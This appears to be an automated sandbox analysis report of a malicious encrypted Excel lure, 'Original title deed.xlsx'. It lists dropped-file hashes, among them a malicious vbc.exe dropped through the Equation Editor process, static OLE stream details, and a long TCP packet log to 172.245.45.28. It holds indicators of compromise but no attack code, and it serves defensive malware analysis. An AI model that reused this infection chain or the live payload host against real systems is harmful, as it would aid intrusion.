                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\ue7qbln2lrz74jd4
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7173
                            Entropy (8bit):7.9288168595599275
                            Encrypted:false
                            SSDEEP:192:kpPhVgCWc+OJqhfj0/m3dD5ehohe2PrKTsddDKz:GZaCW0yfj0/sA8rKTeY
                            MD5:C71EE4E61ECF8144240EE54CB9941674
                            SHA1:DFF070E5E55F02F14437397FDDA413879BE28155
                            SHA-256:BA56EDDB23DE5F224C417A2A784195D29BCC858023CC9227B4F4DA200DC0C6DD
                            SHA-512:8FA1106FCBBD009626E7B44A0F78A2816439EEB33D25BADB94566A8A18F4426D2ED7730CDB54F6EE51A9B5901A92F856E5A70BF8FDEC9CFFB6C5B2D402DFDC3C
                            Malicious:false
                            C:\Users\user\Desktop\~$Original title deed.xlsx
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):1.4377382811115937
                            Encrypted:false
                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                            Malicious:false
                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            C:\Users\Public\vbc.exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):599035
                            Entropy (8bit):7.977146744978909
                            Encrypted:false
                            SSDEEP:12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
                            MD5:669DD51D521BE84D6F2C45012115FC5F
                            SHA1:DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
                            SHA-256:5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
                            SHA-512:77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
                            Malicious:true

                            Static File Info

                            General

                            File type:CDFV2 Encrypted
                            Entropy (8bit):7.995286357977067
                            TrID:
                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                            File name:Original title deed.xlsx
                            File size:1173504
                            MD5:ef302d177adde99f0a6f2e8a6bc9eda1
                            SHA1:ebc1e702f7334f162571ae83a4810fd870766ee3
                            SHA256:caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
                            SHA512:7e0b03c1bf0a70a387e81aae0ba553dfb24f1cb62fa585a2a570dc94d400e867f88daf0ed8ed479cbf2b5522c58fa98fd50abcefaa1189139e994d6015dd7e75
                            SSDEEP:24576:rgV856CB2LCNZOjvtg+Ff7ypoPcKy0pdW7BGpMfhgkraUZzrr54810Qthst:UV+syzoypWcVKMpgkrbZzrra810uGt

                            File Icon

                            Icon Hash:e4e2aa8aa4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "Original title deed.xlsx"

                            Indicators

                            Has Summary Info:False
                            Application Name:unknown
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:False

                            Streams

                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                            General
                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                            File Type:data
                            Stream Size:64
                            Entropy:2.73637206947
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                            General
                            Stream Path:\x6DataSpaces/DataSpaceMap
                            File Type:data
                            Stream Size:112
                            Entropy:2.7597816111
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                            General
                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                            File Type:data
                            Stream Size:200
                            Entropy:3.13335930328
                            Base64 Encoded:False
                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                            General
                            Stream Path:\x6DataSpaces/Version
                            File Type:data
                            Stream Size:76
                            Entropy:2.79079600998
                            Base64 Encoded:False
                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 1160504
                            General
                            Stream Path:EncryptedPackage
                            File Type:data
                            Stream Size:1160504
                            Entropy:7.99982473669
                            Base64 Encoded:True
                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                            General
                            Stream Path:EncryptionInfo
                            File Type:data
                            Stream Size:224
                            Entropy:4.52717392857
                            Base64 Encoded:False
                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . [ . . s M . . u . . 9 ~ . . . . . . . . . . . } . . . . . . . . . a . . w . 7 d . . . 0 . C . . U . . . . . . D . ! 1 k 5 l M .

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            May 3, 2021 14:55:42.021239042 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021245003 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021260023 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021265030 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021282911 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021285057 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021303892 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021306038 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021322012 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021330118 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021341085 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021349907 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021358967 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021375895 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021377087 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021399021 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021410942 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021420002 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021434069 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021451950 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021452904 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021471977 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021472931 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021487951 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021495104 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021505117 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021516085 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021522045 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021538973 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021542072 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021555901 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021564007 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021575928 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021589041 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021594048 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021610975 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021612883 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021626949 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021634102 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021644115 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021660089 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021666050 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021676064 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021686077 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021694899 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021709919 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021714926 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021733999 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.021780968 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021787882 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.021790028 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.023833036 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.218235970 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218264103 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218276978 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218295097 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218311071 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218327045 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.218477964 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.218502998 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.219443083 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.219465971 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.219527006 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223735094 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223762989 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223779917 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223798037 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223814011 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223831892 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223849058 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223848104 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223869085 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223872900 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223889112 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223906040 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223915100 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223923922 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223941088 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223948002 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223958969 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223975897 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.223982096 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.223994017 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224010944 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224014044 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224034071 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224037886 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224050999 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224069118 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224071026 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224085093 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224102020 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224102974 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224119902 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224128008 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224136114 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224158049 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224158049 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224176884 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224190950 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224195957 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224214077 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224220991 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224231958 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224250078 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224250078 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224267006 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224278927 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224283934 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224304914 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224308968 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224323034 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224339008 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224339962 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224354982 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224371910 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224373102 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224389076 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224397898 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224406004 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224422932 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224426985 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224443913 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.224462032 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.224493027 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.226434946 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.423815966 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423847914 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423865080 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423882961 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423902035 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423918009 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423935890 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423950911 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423968077 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423983097 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.423998117 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424000978 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424015045 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424030066 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424035072 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424035072 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424053907 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424057961 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424072027 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424079895 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424096107 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424112082 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424340963 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424370050 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424386978 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424402952 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424408913 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424427032 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424446106 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424459934 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424506903 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424525976 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424542904 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424546003 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424561024 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424561977 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424580097 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424581051 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424597979 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424617052 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424621105 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424623966 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424633026 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424639940 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424649954 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424659014 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424674988 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424675941 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424691916 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424694061 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424710989 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424711943 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424726009 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424730062 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424743891 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424748898 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424762011 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424771070 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424781084 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424789906 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424808025 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424822092 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424827099 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424839973 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424844027 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424859047 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424861908 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424880028 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424880028 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424899101 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424899101 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424918890 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424921036 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424933910 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424942017 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424951077 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424959898 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424977064 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.424978971 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424994946 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.424995899 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425014973 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425015926 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425034046 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425035000 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425054073 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425055981 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425071001 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425079107 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425090075 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425097942 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425111055 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425115108 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425128937 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425132990 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425147057 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425151110 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425168037 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425169945 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425184965 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425189018 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425203085 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425204992 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425225019 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425225019 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425244093 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425244093 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425261974 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425265074 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425280094 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425297022 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425312996 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425329924 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425347090 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425365925 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425395012 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425414085 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425422907 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425431967 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425451040 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425467968 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425483942 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425501108 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425503016 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425518990 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425525904 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425539017 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425556898 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425568104 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425571918 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425575018 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425592899 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425595045 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425611019 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425620079 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425628901 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425640106 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425646067 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425662041 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425664902 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425684929 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425693035 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425702095 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425710917 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425719023 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425734997 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425738096 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425753117 CEST8049165172.245.45.28192.168.2.22
